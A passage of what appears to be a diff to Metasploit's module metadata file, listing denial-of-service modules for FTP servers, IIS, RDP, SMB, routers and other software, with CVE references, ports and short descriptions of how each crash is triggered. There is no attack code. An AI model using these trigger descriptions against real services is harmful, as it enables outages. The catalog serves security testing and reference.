This bug\n was introduced in version 4.6.0 and corrected in 4.6.8/5.8.5.\n Compiler differences may prevent this bug from causing any\n noticeable result on many systems (RHEL6 is affected).", + "references": [ + "CVE-2011-3200", + "URL-https://www.rsyslog.com/potential-dos-with-malformed-tag/", + "URL-https://bugzilla.redhat.com/show_bug.cgi?id=727644" + ], + "platform": "", + "arch": "", + "rport": 514, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/auxiliary/dos/syslog/rsyslog_long_tag.rb", + "is_install_path": true, + "ref_name": "dos/syslog/rsyslog_long_tag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/tcp/claymore_dos": { + "name": "Claymore Dual GPU Miner Format String dos attack", + "fullname": "auxiliary/dos/tcp/claymore_dos", + "aliases": [], + "rank": 300, + "disclosure_date": "2018-02-06", + "type": "auxiliary", + "author": [ + "res1n", + "bluebird" + ], + "description": "Claymore’s Dual GPU Miner 10.5 and below is vulnerable to a format strings vulnerability. 
This allows an\n unauthenticated attacker to read memory addresses, or immediately terminate the mining process causing\n a denial of service.", + "references": [ + "CVE-2018-6317", + "EDB-43972", + "URL-https://github.com/nanopool/Claymore-Dual-Miner" + ], + "platform": "", + "arch": "", + "rport": 3333, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2021-05-17 17:04:49 +0000", + "path": "/modules/auxiliary/dos/tcp/claymore_dos.py", + "is_install_path": true, + "ref_name": "dos/tcp/claymore_dos", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/tcp/junos_tcp_opt": { + "name": "Juniper JunOS Malformed TCP Option", + "fullname": "auxiliary/dos/tcp/junos_tcp_opt", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "todb " + ], + "description": "This module exploits a denial of service vulnerability\n in Juniper Network's JunOS router operating system. 
By sending a TCP\n packet with TCP option 101 set, an attacker can cause an affected\n router to reboot.", + "references": [ + "BID-37670", + "OSVDB-61538", + "URL-http://praetorianprefect.com/archives/2010/01/junos-juniper-flaw-exposes-core-routers-to-kernal-crash/" + ], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/auxiliary/dos/tcp/junos_tcp_opt.rb", + "is_install_path": true, + "ref_name": "dos/tcp/junos_tcp_opt", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/tcp/synflood": { + "name": "TCP SYN Flooder", + "fullname": "auxiliary/dos/tcp/synflood", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "kris katterjohn " + ], + "description": "A simple TCP SYN flooder", + "references": [], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/auxiliary/dos/tcp/synflood.rb", + "is_install_path": true, + "ref_name": "dos/tcp/synflood", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/upnp/miniupnpd_dos": { + "name": "MiniUPnPd 1.4 Denial of Service (DoS) Exploit", + "fullname": "auxiliary/dos/upnp/miniupnpd_dos", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-03-27", + "type": "auxiliary", + "author": [ + "hdm ", + "Dejan Lukan" + ], + "description": "This module allows remote attackers to cause a denial of service (DoS)\n in MiniUPnP 1.0 server via a specifically crafted UDP request.", + "references": [ + "CVE-2013-0229", + "OSVDB-89625", + "BID-57607", + 
"URL-https://www.rapid7.com/blog/post/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play/", + "URL-https://www.hdm.io/writing/SecurityFlawsUPnP.pdf" + ], + "platform": "", + "arch": "", + "rport": 1900, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2022-12-04 17:41:24 +0000", + "path": "/modules/auxiliary/dos/upnp/miniupnpd_dos.rb", + "is_install_path": true, + "ref_name": "dos/upnp/miniupnpd_dos", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/windows/appian/appian_bpm": { + "name": "Appian Enterprise Business Suite 5.6 SP1 DoS", + "fullname": "auxiliary/dos/windows/appian/appian_bpm", + "aliases": [], + "rank": 300, + "disclosure_date": "2007-12-17", + "type": "auxiliary", + "author": [ + "guiness.stout " + ], + "description": "This module exploits a denial of service flaw in the Appian\n Enterprise Business Suite service.", + "references": [ + "CVE-2007-6509", + "OSVDB-39500", + "URL-http://archives.neohapsis.com/archives/fulldisclosure/2007-12/0440.html" + ], + "platform": "", + "arch": "", + "rport": 5400, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/windows/appian/appian_bpm.rb", + "is_install_path": true, + "ref_name": "dos/windows/appian/appian_bpm", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/windows/browser/ms09_065_eot_integer": { + "name": "Microsoft Windows EOT Font Table Directory Integer Overflow", + "fullname": "auxiliary/dos/windows/browser/ms09_065_eot_integer", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-11-10", + "type": "auxiliary", + "author": [ + "hdm " + ], + "description": "This module exploits an integer 
overflow flaw in the Microsoft Windows Embedded\n OpenType font parsing code located in win32k.sys. Since the kernel itself parses\n embedded web fonts, it is possible to trigger a BSoD from a normal web page when\n viewed with Internet Explorer.", + "references": [ + "CVE-2009-2514", + "MSB-MS09-065", + "OSVDB-59869" + ], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2022-03-10 18:03:35 +0000", + "path": "/modules/auxiliary/dos/windows/browser/ms09_065_eot_integer.rb", + "is_install_path": true, + "ref_name": "dos/windows/browser/ms09_065_eot_integer", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "WebServer", + "description": "Serve exploit via web server" + } + ] + }, + "auxiliary_dos/windows/ftp/filezilla_admin_user": { + "name": "FileZilla FTP Server Admin Interface Denial of Service", + "fullname": "auxiliary/dos/windows/ftp/filezilla_admin_user", + "aliases": [], + "rank": 300, + "disclosure_date": "2005-11-07", + "type": "auxiliary", + "author": [ + "aushack " + ], + "description": "This module triggers a Denial of Service condition in the FileZilla FTP\n Server Administration Interface in versions 0.9.4d and earlier.\n By sending a procession of excessively long USER commands to the FTP\n Server, the Administration Interface (FileZilla Server Interface.exe)\n when running, will overwrite the stack with our string and generate an\n exception. 
The FileZilla FTP Server itself will continue functioning.", + "references": [ + "BID-15346", + "CVE-2005-3589", + "EDB-1336", + "OSVDB-20817" + ], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb", + "is_install_path": true, + "ref_name": "dos/windows/ftp/filezilla_admin_user", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/windows/ftp/filezilla_server_port": { + "name": "FileZilla FTP Server Malformed PORT Denial of Service", + "fullname": "auxiliary/dos/windows/ftp/filezilla_server_port", + "aliases": [], + "rank": 300, + "disclosure_date": "2006-12-11", + "type": "auxiliary", + "author": [ + "aushack " + ], + "description": "This module triggers a Denial of Service condition in the FileZilla FTP\n Server versions 0.9.21 and earlier. 
By sending a malformed PORT command\n then LIST command, the server attempts to write to a NULL pointer.", + "references": [ + "BID-21542", + "BID-21549", + "CVE-2006-6565", + "EDB-2914", + "OSVDB-34435" + ], + "platform": "", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb", + "is_install_path": true, + "ref_name": "dos/windows/ftp/filezilla_server_port", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/windows/ftp/guildftp_cwdlist": { + "name": "Guild FTPd 0.999.8.11/0.999.14 Heap Corruption", + "fullname": "auxiliary/dos/windows/ftp/guildftp_cwdlist", + "aliases": [], + "rank": 300, + "disclosure_date": "2008-10-12", + "type": "auxiliary", + "author": [ + "kris katterjohn " + ], + "description": "Guild FTPd 0.999.8.11 and 0.999.14 are vulnerable\n to heap corruption. 
You need to have a valid login\n so you can run CWD and LIST.", + "references": [ + "CVE-2008-4572", + "OSVDB-49045", + "EDB-6738" + ], + "platform": "", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": null, + "mod_time": "2022-08-08 01:40:15 +0000", + "path": "/modules/auxiliary/dos/windows/ftp/guildftp_cwdlist.rb", + "is_install_path": true, + "ref_name": "dos/windows/ftp/guildftp_cwdlist", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/windows/ftp/iis75_ftpd_iac_bof": { + "name": "Microsoft IIS FTP Server Encoded Response Overflow Trigger", + "fullname": "auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-12-21", + "type": "auxiliary", + "author": [ + "Matthew Bergin", + "jduck " + ], + "description": "This module triggers a heap overflow when processing a specially crafted\n FTP request containing Telnet IAC (0xff) bytes. 
When constructing the response,\n the Microsoft IIS FTP Service overflows the heap buffer with 0xff bytes.\n\n This issue can be triggered pre-auth and may in fact be exploitable for\n remote code execution.", + "references": [ + "CVE-2010-3972", + "OSVDB-70167", + "BID-45542", + "MSB-MS11-004", + "EDB-15803", + "URL-https://msrc-blog.microsoft.com/2010/12/22/assessing-an-iis-ftp-7-5-unauthenticated-denial-of-service-vulnerability/" + ], + "platform": "", + "arch": "", + "rport": 21, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb", + "is_install_path": true, + "ref_name": "dos/windows/ftp/iis75_ftpd_iac_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/windows/ftp/iis_list_exhaustion": { + "name": "Microsoft IIS FTP Server LIST Stack Exhaustion", + "fullname": "auxiliary/dos/windows/ftp/iis_list_exhaustion", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-09-03", + "type": "auxiliary", + "author": [ + "Kingcope", + "Myo Soe" + ], + "description": "This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. 
If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.", + "references": [ + "CVE-2009-2521", + "BID-36273", + "OSVDB-57753", + "MSB-MS09-053", + "URL-http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html" + ], + "platform": "", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", + "is_install_path": true, + "ref_name": "dos/windows/ftp/iis_list_exhaustion", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/windows/ftp/solarftp_user": { + "name": "Solar FTP Server Malformed USER Denial of Service", + "fullname": "auxiliary/dos/windows/ftp/solarftp_user", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-02-22", + "type": "auxiliary", + "author": [ + "x000 <3d3n@hotmail.com.br>", + "C4SS!0 G0M3S ", + "sinn3r " + ], + "description": "This module will send a format string as USER to Solar FTP, causing a\n READ violation in function \"__output_1()\" found in \"sfsservice.exe\"\n while trying to calculate the length of the string. 
This vulnerability\n affects versions 2.1.1 and earlier.", + "references": [ + "EDB-16204" + ], + "platform": "", + "arch": "", + "rport": 21, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/windows/ftp/solarftp_user.rb", + "is_install_path": true, + "ref_name": "dos/windows/ftp/solarftp_user", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/windows/ftp/titan626_site": { + "name": "Titan FTP Server 6.26.630 SITE WHO DoS", + "fullname": "auxiliary/dos/windows/ftp/titan626_site", + "aliases": [], + "rank": 300, + "disclosure_date": "2008-10-14", + "type": "auxiliary", + "author": [ + "kris katterjohn " + ], + "description": "The Titan FTP server v6.26 build 630 can be DoS'd by\n issuing \"SITE WHO\". You need a valid login so you\n can send this command.", + "references": [ + "CVE-2008-6082", + "OSVDB-49177", + "EDB-6753" + ], + "platform": "", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": null, + "mod_time": "2022-08-08 01:40:15 +0000", + "path": "/modules/auxiliary/dos/windows/ftp/titan626_site.rb", + "is_install_path": true, + "ref_name": "dos/windows/ftp/titan626_site", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/windows/ftp/vicftps50_list": { + "name": "Victory FTP Server 5.0 LIST DoS", + "fullname": "auxiliary/dos/windows/ftp/vicftps50_list", + "aliases": [], + "rank": 300, + "disclosure_date": "2008-10-24", + "type": "auxiliary", + "author": [ + "kris katterjohn " + ], + "description": "The Victory FTP Server v5.0 can be brought down by sending\n a very simple LIST command", + "references": [ + "CVE-2008-2031", + 
"CVE-2008-6829", + "OSVDB-44608", + "EDB-6834" + ], + "platform": "", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": null, + "mod_time": "2022-08-08 01:40:15 +0000", + "path": "/modules/auxiliary/dos/windows/ftp/vicftps50_list.rb", + "is_install_path": true, + "ref_name": "dos/windows/ftp/vicftps50_list", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/windows/ftp/winftp230_nlst": { + "name": "WinFTP 2.3.0 NLST Denial of Service", + "fullname": "auxiliary/dos/windows/ftp/winftp230_nlst", + "aliases": [], + "rank": 300, + "disclosure_date": "2008-09-26", + "type": "auxiliary", + "author": [ + "kris katterjohn " + ], + "description": "This module is a very rough port of Julien Bedard's\n PoC. You need a valid login, but even anonymous can\n do it if it has permission to call NLST.", + "references": [ + "CVE-2008-5666", + "OSVDB-49043", + "EDB-6581" + ], + "platform": "", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/windows/ftp/winftp230_nlst.rb", + "is_install_path": true, + "ref_name": "dos/windows/ftp/winftp230_nlst", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/windows/ftp/xmeasy560_nlst": { + "name": "XM Easy Personal FTP Server 5.6.0 NLST DoS", + "fullname": "auxiliary/dos/windows/ftp/xmeasy560_nlst", + "aliases": [], + "rank": 300, + "disclosure_date": "2008-10-13", + "type": "auxiliary", + "author": [ + "kris katterjohn " + ], + "description": "This module is a port of shinnai's script. 
You need\n a valid login, but even anonymous can do it as long\n as it has permission to call NLST.", + "references": [ + "CVE-2008-5626", + "OSVDB-50837", + "EDB-6741" + ], + "platform": "", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": null, + "mod_time": "2022-08-08 01:40:15 +0000", + "path": "/modules/auxiliary/dos/windows/ftp/xmeasy560_nlst.rb", + "is_install_path": true, + "ref_name": "dos/windows/ftp/xmeasy560_nlst", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/windows/ftp/xmeasy570_nlst": { + "name": "XM Easy Personal FTP Server 5.7.0 NLST DoS", + "fullname": "auxiliary/dos/windows/ftp/xmeasy570_nlst", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-03-27", + "type": "auxiliary", + "author": [ + "kris katterjohn " + ], + "description": "You need a valid login to DoS this FTP server, but\n even anonymous can do it as long as it has permission\n to call NLST.", + "references": [ + "CVE-2008-5626", + "OSVDB-50837", + "EDB-8294" + ], + "platform": "", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": null, + "mod_time": "2022-08-08 01:40:15 +0000", + "path": "/modules/auxiliary/dos/windows/ftp/xmeasy570_nlst.rb", + "is_install_path": true, + "ref_name": "dos/windows/ftp/xmeasy570_nlst", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/windows/games/kaillera": { + "name": "Kaillera 0.86 Server Denial of Service", + "fullname": "auxiliary/dos/windows/games/kaillera", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-07-02", + "type": "auxiliary", + "author": [ + "Sil3nt_Dre4m" + ], + "description": "The Kaillera 0.86 server can be shut down by 
sending any malformed packet\n after the initial \"hello\" packet.", + "references": [], + "platform": "", + "arch": "", + "rport": 27888, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/windows/games/kaillera.rb", + "is_install_path": true, + "ref_name": "dos/windows/games/kaillera", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166": { + "name": "Windows IIS HTTP Protocol Stack DOS", + "fullname": "auxiliary/dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166", + "aliases": [], + "rank": 300, + "disclosure_date": "2021-05-11", + "type": "auxiliary", + "author": [ + "Max", + "Stefan Blair", + "Axel Souchet", + "Maurice LAMBERT " + ], + "description": "This module exploits CVE-2021-31166, a UAF bug in http.sys\n when parsing specially crafted Accept-Encoding headers\n that was patched by Microsoft in May 2021, on vulnerable\n IIS servers. 
Successful exploitation will result in\n the target computer BSOD'ing before subsequently rebooting.\n Note that the target IIS server may or may not come back up,\n this depends on the target's settings as to whether IIS\n is configured to start on reboot.", + "references": [ + "CVE-2021-31166", + "URL-https://nvd.nist.gov/vuln/detail/CVE-2021-31166", + "URL-https://github.com/mauricelambert/CVE-2021-31166", + "URL-https://twitter.com/metr0/status/1392631376592076805", + "URL-https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31166" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2022-10-01 17:54:59 +0000", + "path": "/modules/auxiliary/dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166.rb", + "is_install_path": true, + "ref_name": "dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-os-restarts" + ], + "Reliability": [], + "SideEffects": [ + "ioc-in-logs", + "screen-effects" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/windows/http/ms10_065_ii6_asp_dos": { + "name": "Microsoft IIS 6.0 ASP Stack Exhaustion Denial of Service", + "fullname": "auxiliary/dos/windows/http/ms10_065_ii6_asp_dos", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-09-14", + "type": "auxiliary", + "author": [ + "Heyder Andrade ", + "Leandro Oliveira " + ], + "description": "The vulnerability allows remote unauthenticated attackers to force the IIS server\n to become unresponsive until the IIS service is restarted manually by the administrator.\n Required is that Active Server Pages are hosted by the IIS and that an ASP script reads\n out a Post Form value.", + "references": [ + 
"CVE-2010-1899", + "OSVDB-67978", + "MSB-MS10-065", + "EDB-15167" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/windows/http/ms10_065_ii6_asp_dos.rb", + "is_install_path": true, + "ref_name": "dos/windows/http/ms10_065_ii6_asp_dos", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/windows/http/pi3web_isapi": { + "name": "Pi3Web ISAPI DoS", + "fullname": "auxiliary/dos/windows/http/pi3web_isapi", + "aliases": [], + "rank": 300, + "disclosure_date": "2008-11-13", + "type": "auxiliary", + "author": [ + "kris katterjohn " + ], + "description": "The Pi3Web HTTP server crashes when a request is made for an invalid DLL\n file in /isapi for versions 2.0.13 and earlier. By default, the non-DLLs\n in this directory after installation are users.txt, install.daf and\n readme.daf.", + "references": [ + "CVE-2008-6938", + "OSVDB-49998", + "EDB-7109" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/windows/http/pi3web_isapi.rb", + "is_install_path": true, + "ref_name": "dos/windows/http/pi3web_isapi", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/windows/llmnr/ms11_030_dnsapi": { + "name": "Microsoft Windows DNSAPI.dll LLMNR Buffer Underrun DoS", + "fullname": "auxiliary/dos/windows/llmnr/ms11_030_dnsapi", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-04-12", + "type": "auxiliary", + "author": [ + "jduck " + ], + 
"description": "This module exploits a buffer underrun vulnerability in Microsoft's DNSAPI.dll\n as distributed with Windows Vista and later without KB2509553. By sending a\n specially crafted LLMNR query, containing a leading '.' character, an attacker\n can trigger stack exhaustion or potentially cause stack memory corruption.\n\n Although this vulnerability may lead to code execution, it has not been proven\n to be possible at the time of this writing.\n\n NOTE: In some circumstances, a '.' may be found before the top of the stack is\n reached. In these cases, this module may not be able to cause a crash.", + "references": [ + "CVE-2011-0657", + "OSVDB-71780", + "MSB-MS11-030" + ], + "platform": "", + "arch": "", + "rport": 5355, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/dos/windows/llmnr/ms11_030_dnsapi.rb", + "is_install_path": true, + "ref_name": "dos/windows/llmnr/ms11_030_dnsapi", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/windows/nat/nat_helper": { + "name": "Microsoft Windows NAT Helper Denial of Service", + "fullname": "auxiliary/dos/windows/nat/nat_helper", + "aliases": [], + "rank": 300, + "disclosure_date": "2006-10-26", + "type": "auxiliary", + "author": [ + "MC " + ], + "description": "This module exploits a denial of service vulnerability\n within the Internet Connection Sharing service in\n Windows XP.", + "references": [ + "OSVDB-30096", + "BID-20804", + "CVE-2006-5614" + ], + "platform": "", + "arch": "", + "rport": 53, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/windows/nat/nat_helper.rb", + "is_install_path": true, + "ref_name": "dos/windows/nat/nat_helper", + "check": false, + "post_auth": false, + 
"default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/windows/rdp/ms12_020_maxchannelids": { + "name": "MS12-020 Microsoft Remote Desktop Use-After-Free DoS", + "fullname": "auxiliary/dos/windows/rdp/ms12_020_maxchannelids", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-03-16", + "type": "auxiliary", + "author": [ + "Luigi Auriemma", + "Daniel Godas-Lopez", + "Alex Ionescu", + "jduck ", + "#ms12-020" + ], + "description": "This module exploits the MS12-020 RDP vulnerability originally discovered and\n reported by Luigi Auriemma. The flaw can be found in the way the T.125\n ConnectMCSPDU packet is handled in the maxChannelIDs field, which will result\n an invalid pointer being used, therefore causing a denial-of-service condition.", + "references": [ + "CVE-2012-0002", + "MSB-MS12-020", + "URL-http://www.privatepaste.com/ffe875e04a", + "URL-http://web.archive.org/web/20161020044803/http://pastie.org/private/4egcqt9nucxnsiksudy5dw", + "URL-http://web.archive.org/web/20160627131634/http://pastie.org/private/feg8du0e9kfagng4rrg", + "URL-http://stratsec.blogspot.com.au/2012/03/ms12-020-vulnerability-for-breakfast.html", + "EDB-18606", + "URL-https://www.rapid7.com/blog/post/2012/03/21/metasploit-update/" + ], + "platform": "", + "arch": "", + "rport": 3389, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-02-07 12:36:11 +0000", + "path": "/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids.rb", + "is_install_path": true, + "ref_name": "dos/windows/rdp/ms12_020_maxchannelids", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/windows/smb/ms05_047_pnp": { + "name": "Microsoft Plug and Play Service Registry Overflow", + "fullname": "auxiliary/dos/windows/smb/ms05_047_pnp", + "aliases": [], + "rank": 300, + 
"disclosure_date": null, + "type": "auxiliary", + "author": [ + "hdm " + ], + "description": "This module triggers a stack buffer overflow in the Windows Plug\n and Play service. This vulnerability can be exploited on\n Windows 2000 without a valid user account. Since the PnP\n service runs inside the service.exe process, this module\n will result in a forced reboot on Windows 2000. Obtaining\n code execution is possible if user-controlled memory can\n be placed at 0x00000030, 0x0030005C, or 0x005C005C.", + "references": [ + "CVE-2005-2120", + "MSB-MS05-047", + "BID-15065", + "OSVDB-18830" + ], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": null, + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/auxiliary/dos/windows/smb/ms05_047_pnp.rb", + "is_install_path": true, + "ref_name": "dos/windows/smb/ms05_047_pnp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/windows/smb/ms06_035_mailslot": { + "name": "Microsoft SRV.SYS Mailslot Write Corruption", + "fullname": "auxiliary/dos/windows/smb/ms06_035_mailslot", + "aliases": [], + "rank": 300, + "disclosure_date": "2006-07-11", + "type": "auxiliary", + "author": [ + "hdm " + ], + "description": "This module triggers a kernel pool corruption bug in SRV.SYS. Each\n call to the mailslot write function results in a two byte return value\n being written into the response packet. The code which creates this packet\n fails to consider these two bytes in the allocation routine, resulting in\n a slow corruption of the kernel memory pool. 
These two bytes are almost\n always set to \"\\xff\\xff\" (a short integer with value of -1).", + "references": [ + "BID-19215", + "OSVDB-27644", + "CVE-2006-3942", + "URL-http://www.coresecurity.com/common/showdoc.php?idx=562&idxseccion=10", + "MSB-MS06-035" + ], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb", + "is_install_path": true, + "ref_name": "dos/windows/smb/ms06_035_mailslot", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "Attack", + "description": "Run Denial of Service" + } + ] + }, + "auxiliary_dos/windows/smb/ms06_063_trans": { + "name": "Microsoft SRV.SYS Pipe Transaction No Null", + "fullname": "auxiliary/dos/windows/smb/ms06_063_trans", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "hdm " + ], + "description": "This module exploits a NULL pointer dereference flaw in the\n SRV.SYS driver of the Windows operating system. 
